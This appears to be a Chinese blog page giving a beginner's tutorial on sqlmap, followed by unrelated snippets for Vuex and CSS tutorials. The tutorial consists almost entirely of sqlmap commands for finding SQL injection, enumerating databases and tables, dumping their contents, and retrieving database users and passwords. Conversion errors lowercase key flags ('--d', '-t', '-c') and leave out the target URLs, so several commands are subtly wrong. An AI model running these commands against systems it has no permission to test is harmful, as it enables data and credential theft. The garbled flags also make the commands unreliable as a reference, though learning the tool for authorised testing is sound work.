SQLMap的入門教程

2021-09-28 18:27:58 字數 916 閱讀 6058

sqlmap是乙個自動化的sql注入工具,其主要功能是掃瞄、發現並利用給定url的sql注入漏洞,還可以檢測xss漏洞,內建了很多繞過的外掛程式,支援的資料庫有:mysql、oracle、postgresql、sqlserver、access、db2、sqlite、firebird、sybase和sap maxdb。sqlmap主要使用五種sql注入技術。

1、判斷是否有存在注入

sqlmap.py -u
2、判斷文字中的請求是否存在注入

sqlmap.py -r 1.txt   # -r讀取檔案,檔案中存入請求頭
3、查詢當前使用者下的所有資料庫

sqlmap.py -u  --dbs
4、獲取資料庫中的表名

sqlmap.py -u  --d 庫名 --tables
5、獲取表中的欄位名

sqlmap.py -u  --d 庫名 -t 表名 --columns
6、獲取字段內容

sqlmap.py -u  --d 庫名 -t 表名 -c 欄位1,欄位2 --dump
7、獲取資料庫的所有使用者

sqlmap.py -u  --users
8、獲取資料庫使用者的密碼

sqlmap.py -u  --passwords
9、獲取當前**資料庫的名稱

sqlmap.py -u  --current-db
10、獲取當前**資料庫的使用者名稱

sqlmap.py -u  --current-user

Vuex的入門教程

前言 在 vue.js 的專案中,如果專案結構簡單,父子元件之間的資料傳遞可以使用 props 或者 emit 等方式,詳細點選這篇文章檢視。但是如果是大型專案,很多時候都需要在子元件之間傳遞資料,使用之前的方式就不太方便。vue 的狀態管理工具 vuex 完美的解決了這個問題。一 安裝並引入 vu...

CSS入門教程

css是 cascading style sheets 的簡稱,中文翻譯為 串接樣式表 也有人翻譯為 樣式表 css用以作為網頁的排版和風格設計,在web標準建站中,對css的熟悉和使用是相當重要的乙個內容。css的作用是彌補html的不足,讓網頁的設計更為靈活。這個文章只是為您介紹css的基礎應用...

CSS入門教程

css是 cascading style sheets 的簡稱,中文翻譯為 串接樣式表 也有人翻譯為 樣式表 css用以作為網頁的排版和風格設計,在web標準建站中,對css的熟悉和使用是相當重要的乙個內容。css的作用是彌補html的不足,讓網頁的設計更為靈活。這個文章只是為您介紹css的基礎應用...